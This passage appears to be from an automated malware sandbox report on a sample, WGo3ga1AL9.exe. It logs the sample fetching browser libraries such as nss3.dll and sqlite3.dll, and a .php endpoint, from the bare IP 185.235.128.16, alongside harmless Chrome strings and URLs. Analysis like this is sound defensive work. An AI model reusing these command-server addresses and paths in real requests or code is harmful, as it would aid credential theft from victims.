                    Source: global trafficHTTP traffic detected: GET /rules/rule230172v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                    Source: global trafficHTTP traffic detected: GET /rules/rule230173v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                    Source: global trafficHTTP traffic detected: GET /rules/rule230174v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                    Source: global trafficHTTP traffic detected: GET /rules/rule120119v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                    Source: global trafficHTTP traffic detected: GET /rules/rule224900v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                    Source: global trafficHTTP traffic detected: GET /rules/rule704101v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                    Source: global trafficHTTP traffic detected: GET /rules/rule704100v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                    Source: global trafficHTTP traffic detected: GET /rules/rule704201v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                    Source: global trafficHTTP traffic detected: GET /rules/rule704200v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                    Source: global trafficHTTP traffic detected: GET /rules/rule704151v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                    Source: global trafficHTTP traffic detected: GET /rules/rule704150v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                    Source: global trafficHTTP traffic detected: GET /rules/rule226009v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                    Source: global trafficHTTP traffic detected: GET / HTTP/1.1Host: 185.235.128.16Connection: Keep-AliveCache-Control: no-cache
                    Source: global trafficHTTP traffic detected: GET /4bdcdc3545a160aa/sqlite3.dll HTTP/1.1Host: 185.235.128.16Cache-Control: no-cache
                    Source: global trafficHTTP traffic detected: GET /4bdcdc3545a160aa/freebl3.dll HTTP/1.1Host: 185.235.128.16Cache-Control: no-cache
                    Source: global trafficHTTP traffic detected: GET /4bdcdc3545a160aa/mozglue.dll HTTP/1.1Host: 185.235.128.16Cache-Control: no-cache
                    Source: global trafficHTTP traffic detected: GET /4bdcdc3545a160aa/msvcp140.dll HTTP/1.1Host: 185.235.128.16Cache-Control: no-cache
                    Source: global trafficHTTP traffic detected: GET /4bdcdc3545a160aa/nss3.dll HTTP/1.1Host: 185.235.128.16Cache-Control: no-cache
                    Source: global trafficHTTP traffic detected: GET /4bdcdc3545a160aa/softokn3.dll HTTP/1.1Host: 185.235.128.16Cache-Control: no-cache
                    Source: global trafficHTTP traffic detected: GET /4bdcdc3545a160aa/vcruntime140.dll HTTP/1.1Host: 185.235.128.16Cache-Control: no-cache
                    Source: chrome.exe, 00000001.00000003.1764576279.00002A1002544000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000001.00000003.1764479281.00002A1003130000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000001.00000003.1763541132.00002A10025D8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: const FACEBOOK_APP_ID=738026486351791;class DoodleShareDialogElement extends PolymerElement{static get is(){return"ntp-doodle-share-dialog"}static get template(){return getTemplate$3()}static get properties(){return{title:String,url:Object}}onFacebookClick_(){const url="https://www.facebook.com/dialog/share"+`?app_id=${FACEBOOK_APP_ID}`+`&href=${encodeURIComponent(this.url.url)}`+`&hashtag=${encodeURIComponent("#GoogleDoodle")}`;WindowProxy.getInstance().open(url);this.notifyShare_(DoodleShareChannel.kFacebook)}onTwitterClick_(){const url="https://twitter.com/intent/tweet"+`?text=${encodeURIComponent(`${this.title}\n${this.url.url}`)}`;WindowProxy.getInstance().open(url);this.notifyShare_(DoodleShareChannel.kTwitter)}onEmailClick_(){const url=`mailto:?subject=${encodeURIComponent(this.title)}`+`&body=${encodeURIComponent(this.url.url)}`;WindowProxy.getInstance().navigate(url);this.notifyShare_(DoodleShareChannel.kEmail)}onCopyClick_(){this.$.url.select();navigator.clipboard.writeText(this.url.url);this.notifyShare_(DoodleShareChannel.kLinkCopy)}onCloseClick_(){this.$.dialog.close()}notifyShare_(channel){this.dispatchEvent(new CustomEvent("share",{detail:channel}))}}customElements.define(DoodleShareDialogElement.is,DoodleShareDialogElement);function getTemplate$2(){return html`<!--_html_template_start_--><style include="cr-hidden-style">:host{--ntp-logo-height:200px;display:flex;flex-direction:column;flex-shrink:0;justify-content:flex-end;min-height:var(--ntp-logo-height)}:host([reduced-logo-space-enabled_]){--ntp-logo-height:168px}:host([doodle-boxed_]){justify-content:flex-end}#logo{forced-color-adjust:none;height:92px;width:272px}:host([single-colored]) #logo{-webkit-mask-image:url(icons/google_logo.svg);-webkit-mask-repeat:no-repeat;-webkit-mask-size:100%;background-color:var(--ntp-logo-color)}:host(:not([single-colored])) #logo{background-image:url(icons/google_logo.svg)}#imageDoodle{cursor:pointer;outline:0}#imageDoodle[tabindex='-1']{cursor:auto}:host([doodle-boxed_]) #imageDoodle{background-color:var(--ntp-logo-box-color);border-radius:20px;padding:16px 24px}:host-context(.focus-outline-visible) #imageDoodle:focus{box-shadow:0 0 0 2px rgba(var(--google-blue-600-rgb),.4)}#imageContainer{display:flex;height:fit-content;position:relative;width:fit-content}#image{max-height:var(--ntp-logo-height);max-width:100%}:host([doodle-boxed_]) #image{max-height:160px}:host([doodle-boxed_][reduced-logo-space-enabled_]) #image{max-height:128px}#animation{height:100%;pointer-events:none;position:absolute;width:100%}#shareButton{background-color:var(--ntp-logo-share-button-background-color,none);border:none;height:var(--ntp-logo-share-button-height,0);left:var(--ntp-logo-share-button-x,0);min-width:var(--ntp-logo-share-button-width,0);opacity:.8;outline:initial;padding:2px;position:absolute;top:var(--ntp-logo-share-button-y,0);width:var(--ntp-logo-share-button-width,0)}#shareButton:hover{opacity:1}#shareButton img{height:100%;width:100%}#iframe{border:none;
                    Source: chrome.exe, 00000001.00000003.1764576279.00002A1002544000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000001.00000003.1764479281.00002A1003130000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000001.00000003.1763541132.00002A10025D8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: const FACEBOOK_APP_ID=738026486351791;class DoodleShareDialogElement extends PolymerElement{static get is(){return"ntp-doodle-share-dialog"}static get template(){return getTemplate$3()}static get properties(){return{title:String,url:Object}}onFacebookClick_(){const url="https://www.facebook.com/dialog/share"+`?app_id=${FACEBOOK_APP_ID}`+`&href=${encodeURIComponent(this.url.url)}`+`&hashtag=${encodeURIComponent("#GoogleDoodle")}`;WindowProxy.getInstance().open(url);this.notifyShare_(DoodleShareChannel.kFacebook)}onTwitterClick_(){const url="https://twitter.com/intent/tweet"+`?text=${encodeURIComponent(`${this.title}\n${this.url.url}`)}`;WindowProxy.getInstance().open(url);this.notifyShare_(DoodleShareChannel.kTwitter)}onEmailClick_(){const url=`mailto:?subject=${encodeURIComponent(this.title)}`+`&body=${encodeURIComponent(this.url.url)}`;WindowProxy.getInstance().navigate(url);this.notifyShare_(DoodleShareChannel.kEmail)}onCopyClick_(){this.$.url.select();navigator.clipboard.writeText(this.url.url);this.notifyShare_(DoodleShareChannel.kLinkCopy)}onCloseClick_(){this.$.dialog.close()}notifyShare_(channel){this.dispatchEvent(new CustomEvent("share",{detail:channel}))}}customElements.define(DoodleShareDialogElement.is,DoodleShareDialogElement);function getTemplate$2(){return html`<!--_html_template_start_--><style include="cr-hidden-style">:host{--ntp-logo-height:200px;display:flex;flex-direction:column;flex-shrink:0;justify-content:flex-end;min-height:var(--ntp-logo-height)}:host([reduced-logo-space-enabled_]){--ntp-logo-height:168px}:host([doodle-boxed_]){justify-content:flex-end}#logo{forced-color-adjust:none;height:92px;width:272px}:host([single-colored]) #logo{-webkit-mask-image:url(icons/google_logo.svg);-webkit-mask-repeat:no-repeat;-webkit-mask-size:100%;background-color:var(--ntp-logo-color)}:host(:not([single-colored])) #logo{background-image:url(icons/google_logo.svg)}#imageDoodle{cursor:pointer;outline:0}#imageDoodle[tabindex='-1']{cursor:auto}:host([doodle-boxed_]) #imageDoodle{background-color:var(--ntp-logo-box-color);border-radius:20px;padding:16px 24px}:host-context(.focus-outline-visible) #imageDoodle:focus{box-shadow:0 0 0 2px rgba(var(--google-blue-600-rgb),.4)}#imageContainer{display:flex;height:fit-content;position:relative;width:fit-content}#image{max-height:var(--ntp-logo-height);max-width:100%}:host([doodle-boxed_]) #image{max-height:160px}:host([doodle-boxed_][reduced-logo-space-enabled_]) #image{max-height:128px}#animation{height:100%;pointer-events:none;position:absolute;width:100%}#shareButton{background-color:var(--ntp-logo-share-button-background-color,none);border:none;height:var(--ntp-logo-share-button-height,0);left:var(--ntp-logo-share-button-x,0);min-width:var(--ntp-logo-share-button-width,0);opacity:.8;outline:initial;padding:2px;position:absolute;top:var(--ntp-logo-share-button-y,0);width:var(--ntp-logo-share-button-width,0)}#shareButton:hover{opacity:1}#shareButton img{height:100%;width:100%}#iframe{border:none;
                    Source: global trafficDNS traffic detected: DNS query: www.google.com
                    Source: global trafficDNS traffic detected: DNS query: apis.google.com
                    Source: global trafficDNS traffic detected: DNS query: play.google.com
                    Source: global trafficDNS traffic detected: DNS query: osteo9.esalnuvol.com
                    Source: unknownHTTP traffic detected: POST /log?format=json&hasfast=true HTTP/1.1Host: play.google.comConnection: keep-aliveContent-Length: 905sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-platform: "Windows"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Content-Type: application/x-www-form-urlencoded;charset=UTF-8Accept: */*Origin: chrome-untrusted://new-tab-pageX-Client-Data: CKq1yQEIi7bJAQiktskBCKmdygEIoOHKAQiVocsBCJz+zAEIhaDNAQi5ys0BCIrTzQEY9snNARjrjaUXSec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
                    Source: WGo3ga1AL9.exe, 00000000.00000002.2312969222.00000000004E4000.00000040.00000001.01000000.00000003.sdmp, WGo3ga1AL9.exe, 00000000.00000002.2313774503.000000000098E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.235.128.16
                    Source: WGo3ga1AL9.exe, 00000000.00000002.2313774503.00000000009D2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.235.128.16/
                    Source: WGo3ga1AL9.exe, 00000000.00000002.2313774503.00000000009D2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.235.128.16/3
                    Source: WGo3ga1AL9.exe, 00000000.00000002.2313774503.00000000009D2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.235.128.16/4bdcdc3545a160aa/freebl3.dll
                    Source: WGo3ga1AL9.exe, 00000000.00000002.2313774503.00000000009D2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.235.128.16/4bdcdc3545a160aa/freebl3.dll3
                    Source: WGo3ga1AL9.exe, 00000000.00000002.2313774503.00000000009D2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.235.128.16/4bdcdc3545a160aa/mozglue.dllC
                    Source: WGo3ga1AL9.exe, 00000000.00000002.2313774503.00000000009D2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.235.128.16/4bdcdc3545a160aa/mozglue.dlli
                    Source: WGo3ga1AL9.exe, 00000000.00000002.2313774503.00000000009D2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.235.128.16/4bdcdc3545a160aa/msvcp140.dll
                    Source: WGo3ga1AL9.exe, 00000000.00000002.2313774503.00000000009F2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.235.128.16/4bdcdc3545a160aa/nss3.dll
                    Source: WGo3ga1AL9.exe, 00000000.00000002.2313774503.00000000009D2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.235.128.16/4bdcdc3545a160aa/softokn3.dll
                    Source: WGo3ga1AL9.exe, 00000000.00000002.2313774503.00000000009D2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.235.128.16/4bdcdc3545a160aa/softokn3.dllg
                    Source: WGo3ga1AL9.exe, 00000000.00000002.2312969222.0000000000514000.00000040.00000001.01000000.00000003.sdmpString found in binary or memory: http://185.235.128.16/4bdcdc3545a160aa/sqlite3.dll
                    Source: WGo3ga1AL9.exe, 00000000.00000002.2313774503.00000000009D2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.235.128.16/4bdcdc3545a160aa/sqlite3.dllU
                    Source: WGo3ga1AL9.exe, 00000000.00000002.2313774503.00000000009D2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.235.128.16/4bdcdc3545a160aa/vcruntime140.dll
                    Source: WGo3ga1AL9.exe, 00000000.00000002.2312969222.0000000000514000.00000040.00000001.01000000.00000003.sdmpString found in binary or memory: http://185.235.128.16/562c1eb14955c897.php
                    Source: WGo3ga1AL9.exe, 00000000.00000002.2328679581.0000000021031000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.235.128.16/562c1eb14955c897.php2s
                    Source: WGo3ga1AL9.exe, 00000000.00000002.2312969222.000000000066E000.00000040.00000001.01000000.00000003.sdmpString found in binary or memory: http://185.235.128.16/562c1eb14955c897.phption:
                    Source: WGo3ga1AL9.exe, 00000000.00000002.2312969222.000000000066E000.00000040.00000001.01000000.00000003.sdmpString found in binary or memory: http://185.235.128.16562c1eb14955c897.phption:
                    Source: WGo3ga1AL9.exe, 00000000.00000002.2313774503.000000000098E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.235.128.16M
                    Source: chrome.exe, 00000001.00000003.1758922032.00002A10025D8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000001.00000003.1759282928.00002A1002BC8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000001.00000003.1759255152.00002A10025D8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/1423136
                    Source: chrome.exe, 00000001.00000003.1758922032.00002A10025D8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000001.00000003.1759282928.00002A1002BC8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000001.00000003.1759255152.00002A10025D8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/2162
                    Source: chrome.exe, 00000001.00000003.1758922032.00002A10025D8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000001.00000003.1759282928.00002A1002BC8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000001.00000003.1759255152.00002A10025D8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/2517
                    Source: chrome.exe, 00000001.00000003.1758922032.00002A10025D8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000001.00000003.1759282928.00002A1002BC8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000001.00000003.1759255152.00002A10025D8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/2970
                    Source: chrome.exe, 00000001.00000003.1758922032.00002A10025D8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000001.00000003.1759282928.00002A1002BC8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000001.00000003.1759255152.00002A10025D8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/3078
                    Source: chrome.exe, 00000001.00000003.1758922032.00002A10025D8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000001.00000003.1759282928.00002A1002BC8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000001.00000003.1759255152.00002A10025D8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/3205
                    Source: chrome.exe, 00000001.00000003.1758922032.00002A10025D8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000001.00000003.1759282928.00002A1002BC8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000001.00000003.1759255152.00002A10025D8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/3206
                    Source: chrome.exe, 00000001.00000003.1758922032.00002A10025D8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000001.00000003.1759282928.00002A1002BC8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000001.00000003.1759255152.00002A10025D8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/3452
                    Source: chrome.exe, 00000001.00000003.1758922032.00002A10025D8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000001.00000003.1759282928.00002A1002BC8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000001.00000003.1759255152.00002A10025D8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/3498
                    Source: chrome.exe, 00000001.00000003.1758922032.00002A10025D8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000001.00000003.1759282928.00002A1002BC8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000001.00000003.1759255152.00002A10025D8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/3502
                    Source: chrome.exe, 00000001.00000003.1758922032.00002A10025D8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000001.00000003.1759282928.00002A1002BC8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000001.00000003.1759255152.00002A10025D8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/3577
                    Source: chrome.exe, 00000001.00000003.1758922032.00002A10025D8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000001.00000003.1759282928.00002A1002BC8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000001.00000003.1759255152.00002A10025D8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/3584
                    Source: chrome.exe, 00000001.00000003.1758922032.00002A10025D8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000001.00000003.1759282928.00002A1002BC8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000001.00000003.1759255152.00002A10025D8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/3586
                    Source: chrome.exe, 00000001.00000003.1759255152.00002A10025D8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/3623
                    Source: chrome.exe, 00000001.00000003.1759255152.00002A10025D8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/3624
                    Source: chrome.exe, 00000001.00000003.1759255152.00002A10025D8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/3625
                    Source: chrome.exe, 00000001.00000003.1758922032.00002A10025D8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000001.00000003.1759282928.00002A1002BC8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000001.00000003.1759255152.00002A10025D8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/3832
                    Source: chrome.exe, 00000001.00000003.1758922032.00002A10025D8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000001.00000003.1759282928.00002A1002BC8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000001.00000003.1759255152.00002A10025D8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/3862
                    Source: chrome.exe, 00000001.00000003.1758922032.00002A10025D8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000001.00000003.1759282928.00002A1002BC8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000001.00000003.1759255152.00002A10025D8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/3965
                    Source: chrome.exe, 00000001.00000003.1758922032.00002A10025D8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000001.00000003.1759282928.00002A1002BC8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000001.00000003.1759255152.00002A10025D8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/3970
                    Source: chrome.exe, 00000001.00000003.1758922032.00002A10025D8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000001.00000003.1759282928.00002A1002BC8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000001.00000003.1759255152.00002A10025D8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/4324
                    Source: chrome.exe, 00000001.00000003.1758922032.00002A10025D8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000001.00000003.1759282928.00002A1002BC8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000001.00000003.1759255152.00002A10025D8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/4384
                    Source: chrome.exe, 00000001.00000003.1758922032.00002A10025D8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000001.00000003.1759282928.00002A1002BC8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000001.00000003.1759255152.00002A10025D8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/4405
                    Source: chrome.exe, 00000001.00000003.1758922032.00002A10025D8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000001.00000003.1759282928.00002A1002BC8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000001.00000003.1759255152.00002A10025D8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/4428
                    Source: chrome.exe, 00000001.00000003.1758922032.00002A10025D8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000001.00000003.1759282928.00002A1002BC8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000001.00000003.1759255152.00002A10025D8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/4551
                    Source: chrome.exe, 00000001.00000003.1758922032.00002A10025D8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000001.00000003.1759282928.00002A1002BC8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000001.00000003.1759255152.00002A10025D8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/4633
                    Source: chrome.exe, 00000001.00000003.1758922032.00002A10025D8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000001.00000003.1759282928.00002A1002BC8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000001.00000003.1759255152.00002A10025D8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/4722
                    Source: chrome.exe, 00000001.00000003.1758922032.00002A10025D8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000001.00000003.1759282928.00002A1002BC8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000001.00000003.1759255152.00002A10025D8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/4836
                    Source: chrome.exe, 00000001.00000003.1758922032.00002A10025D8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000001.00000003.1759282928.00002A1002BC8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000001.00000003.1759255152.00002A10025D8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/4901
                    Source: chrome.exe, 00000001.00000003.1758922032.00002A10025D8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000001.00000003.1759282928.00002A1002BC8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000001.00000003.1759255152.00002A10025D8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/4937
                    Source: chrome.exe, 00000001.00000003.1758922032.00002A10025D8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000001.00000003.1759282928.00002A1002BC8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000001.00000003.1759255152.00002A10025D8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/5007
                    Source: chrome.exe, 00000001.00000003.1758922032.00002A10025D8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000001.00000003.1759282928.00002A1002BC8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000001.00000003.1759255152.00002A10025D8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/5055
                    Source: chrome.exe, 00000001.00000003.1758922032.00002A10025D8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000001.00000003.1759282928.00002A1002BC8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000001.00000003.1759255152.00002A10025D8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/5061
                    Source: chrome.exe, 00000001.00000003.1758922032.00002A10025D8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000001.00000003.1759282928.00002A1002BC8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000001.00000003.1759255152.00002A10025D8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/5281
                    Source: chrome.exe, 00000001.00000003.1758922032.00002A10025D8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000001.00000003.1759282928.00002A1002BC8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000001.00000003.1759255152.00002A10025D8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/5371
                    Source: chrome.exe, 00000001.00000003.1758922032.00002A10025D8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000001.00000003.1759282928.00002A1002BC8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000001.00000003.1759255152.00002A10025D8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/5375
                    Source: chrome.exe, 00000001.00000003.1758922032.00002A10025D8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000001.00000003.1759282928.00002A1002BC8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000001.00000003.1759255152.00002A10025D8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/5421
                    Source: chrome.exe, 00000001.00000003.1758922032.00002A10025D8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000001.00000003.1759282928.00002A1002BC8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000001.00000003.1759255152.00002A10025D8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/5430
                    Source: chrome.exe, 00000001.00000003.1758922032.00002A10025D8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000001.00000003.1759282928.00002A1002BC8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000001.00000003.1759255152.00002A10025D8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/5535
                    Source: chrome.exe, 00000001.00000003.1758922032.00002A10025D8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000001.00000003.1759282928.00002A1002BC8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000001.00000003.1759255152.00002A10025D8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/5658
                    Source: chrome.exe, 00000001.00000003.1758922032.00002A10025D8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000001.00000003.1759282928.00002A1002BC8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000001.00000003.1759255152.00002A10025D8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/5750
                    Source: chrome.exe, 00000001.00000003.1758922032.00002A10025D8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000001.00000003.1759282928.00002A1002BC8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000001.00000003.1759255152.00002A10025D8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/5881
